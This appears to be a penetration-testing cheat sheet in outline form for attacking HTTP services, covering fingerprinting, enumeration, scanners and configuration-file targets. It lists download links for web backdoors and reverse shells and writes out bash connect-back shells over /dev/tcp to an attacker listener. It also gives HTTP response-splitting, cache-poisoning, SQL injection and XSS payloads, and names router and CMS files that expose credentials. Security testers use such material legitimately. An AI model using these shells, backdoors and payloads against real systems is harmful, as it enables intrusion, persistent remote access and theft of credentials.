HTTP (80/8080/8888 etc)

• Fingerprint server
  • Telnet ip_address port
  • Firefox plugins
    • All
      • firecat
    • Specific
      • add n edit cookies
      • asnumber
      • header spy
      • live http headers
      • shazou
      • web developer
• Crawl website
  • lynx [options] startfile/URL Options include -traversal -crawl -dump -image_links -source
  • httprint
  • Metagoofil
    • metagoofil.py -d [domain] -l [no. of] -f [type] -o results.html
• Web Directory enumeration
  • Nikto
    • nikto [-h target] [options]
  • DirBuster
  • Wikto
  • Goolag Scanner
• Vulnerability Assessment
  • Manual Tests
    • Default Passwords
    • Install Backdoors
      • ASP
        • https://packetstormsecurity.org/UNIX/penetration/aspxshell.aspx.txt
      • Assorted
        • https://michaeldaw.org/projects/web-backdoor-compilation/
        • https://open-labs.org/hacker_webkit02.tar.gz
      • Perl
        • https://home.arcor.de/mschierlm/test/pmsh.pl
        • https://pentestmonkey.net/tools/perl-reverse-shell/
        • https://freeworld.thc.org/download.php?t=r&f=rwwwshell-2.0.pl.gz
      • PHP
        • https://php.spb.ru/remview/
        • https://pentestmonkey.net/tools/php-reverse-shell/
        • https://pentestmonkey.net/tools/php-findsock-shell/
      • Python
        • https://matahari.sourceforge.net/
      • TCL
        • https://www.irmplc.com/download_pdf.php?src=Creating_Backdoors_in_Cisco_IOS_using_Tcl.pdf&force=yes
      • Bash Connect Back Shell
        • GnuCitizen
          • Atttack Box: nc -l -p Port -vvv
          • Victim: $ exec 5<>/dev/tcp/IP_Address/PortVictim: $ cat <&5 | while read line; do $line 2>&5 >&5; done
        • Neohapsis
          • Atttack Box: nc -l -p Port -vvv
          • Victim: $ exec 0</dev/tcp/IP_Address/Port # First we copy our connection over stdinVictim: $ exec 1>&0 # Next we copy stdin to stdoutVictim: $ exec 2>&0 # And finally stdin to stderrVictim: $ exec /bin/sh 0</dev/tcp/IP_Address/Port 1>&0 2>&0
    • Method Testing
      • nc IP_Adress Port
        • HEAD / HTTP/1.0
        • OPTIONS / HTTP/1.0
        • PROPFIND / HTTP/1.0
        • TRACE / HTTP/1.1
        • PUT https://Target_URL/FILE_NAME
        • POST https://Target_URL/FILE_NAME HTTP/1.x
    • Upload Files
      • curl
        • curl -u <username:password> -T file_to_upload <Target_URL>
        • curl -A “Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)” <Target_URL>
      • put.pl
        • put.pl -h target -r /remote_file_name -f local_file_name
      • webdav
        • cadaver
    • View Page Source
      • Hidden Values
      • Developer Remarks
      • Extraneous Code
      • Passwords!
    • Input Validation Checks
      • NULL or null
        • Possible error messages returned.
      • ‘ , ” , ; , <!
        • Breaks an SQL string or query; used for SQL, XPath and XML Injection tests.
      • – , = , + , “
        • Used to craft SQL Injection queries.
      • ‘ , &, ! , ¦ , < , >
        • Used to find command execution vulnerabilities.
      • “><script>alert(1)</script>
        • Basic Cross-Site Scripting Checks.
      • %0d%0a
        • Carriage Return (%0d) Line Feed (%0a)
          • HTTP Splitting
            • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContent-Type:%20text/html%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
              • i.e. Content-Length= 0 HTTP/1.1 200 OK Content-Type=text/html Content-Length=47<html>blah</html>
          • Cache Poisoning
            • language=?foobar%0d%0aContent-Length:%200%0d%0a%0d%0aHTTP/1.1%20304%20Not%20Modified%0d%0aContent-Type:%20text/html%0d%0aLast-Modified:%20Mon,%2027%20Oct%202003%2014:50:18%20GMT%0d%0aContent-Length:%2047%0d%0a%0d%0a<html>Insert undesireable content here</html>
      • %7f , %ff
        • byte-length overflows; maximum 7- and 8-bit values.
      • -1, other
        • Integer and underflow vulnerabilities.
      • %n , %x , %s
        • Testing for format string vulnerabilities.
      • ../
        • Directory Traversal Vulnerabilities.
      • % , _, *
        • Wildcard characters can sometimes present DoS issues or information disclosure.
      • Ax1024+
        • Overflow vulnerabilities.
    • Automated table and column iteration
      • orderby.py
        • ./orderby.py www.site.com/index.php?id=
      • d3sqlfuzz.py
        • ./d3sqlfuzz.py www.site.com/index.php?id=-1+UNION+ALL+SELECT+1,COLUMN,3+FROM+TABLE–
  • Vulnerability Scanners
    • Acunetix
    • Grendelscan
    • NStealth
    • Obiwan III
    • w3af
  • Specific Applications/ Server Tools
    • Domino
      • dominoaudit
        • dominoaudit.pl [options] -h <IP>
    • Joomla
      • cms_few
        • ./cms.py <site-name>
      • joomsq
        • ./joomsq.py <IP>
      • joomlascan
        • ./joomlascan.py <site> <options>  [options i.e. -p/-proxy <host:port> : Add proxy support -404 : Don’t show 404 responses]
      • joomscan
        • ./joomscan.py -u “www.site.com/joomladir/” -o site.txt -p 127.0.0.1:80
      • jscan
        • jscan.pl -f hostname
        • (shell.txt required)
    • aspaudit.pl
      • asp-audit.pl https://target/app/filename.aspx (options i.e. -bf)
    • Vbulletin
      • vbscan.py
        • vbscan.py <host> <port> -v
        • vbscan.py -update
    • ZyXel
      • zyxel-bf.sh
      • snmpwalk
        • snmpwalk -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2
      • snmpget
        • snmpget -v2c -c public IP_Address 1.3.6.1.4.1.890.1.2.1.2.6.0
• Proxy Testing
  • Burpsuite
  • Crowbar
  • Interceptor
  • Paros
  • Requester Raw
  • Suru
  • WebScarab
• Examine configuration files
  • Generic
    • Examine httpd.conf/ windows config files
  • JBoss
    • JMX Console https://<IP>:8080/jmxconcole/
      • War File
  • Joomla
    • configuration.php
    • diagnostics.php
    • joomla.inc.php
    • config.inc.php
  • Mambo
    • configuration.php
    • config.inc.php
  • WordPress
    • setup-config.php
    • wp-config.php
  • ZyXel
    • /WAN.html (contains PPPoE ISP password)
    • /WLAN_General.html and /WLAN.html (contains WEP key)
    • /rpDyDNS.html (contains DDNS credentials)
    • /Firewall_DefPolicy.html (Firewall)
    • /CF_Keyword.html (Content Filter)
    • /RemMagWWW.html (Remote MGMT)
    • /rpSysAdmin.html (System)
    • /LAN_IP.html (LAN)
    • /NAT_General.html (NAT)
    • /ViewLog.html (Logs)
    • /rpFWUpload.html (Tools)
    • /DiagGeneral.html (Diagnostic)
    • /RemMagSNMP.html (SNMP Passwords)
    • /LAN_ClientList.html (Current DHCP Leases)
    • Config Backups
      • /RestoreCfg.html
      • /BackupCfg.html
      • Note: – The above config files are not human readable and the following tool is required to breakout possible admin credentials and other important settings
        • ZyXEL Config Reader
• Examine web server logs
  • c:\winnt\system32\Logfiles\W3SVC1
    • awk -F ” ” ‘{print $3,$11} filename | sort | uniq
• References
  • White Papers
    • Cross Site Request Forgery: An Introduction to a Common Web Application Weakness
    • Attacking Web Service Security: Message Oriented Madness, XML Worms and Web Service Security Sanity
    • Blind Security Testing – An Evolutionary Approach
    • Command Injection in XML Signatures and Encryption
    • Input Validation Cheat Sheet
    • SQL Injection Cheat Sheet
  • Books
    • Hacking Exposed Web 2.0
    • Hacking Exposed Web Applications
    • The Web Application Hacker’s Handbook
• Exploit Frameworks
  • Brute-force Tools
    • Acunetix
  • Metasploit
  • w3af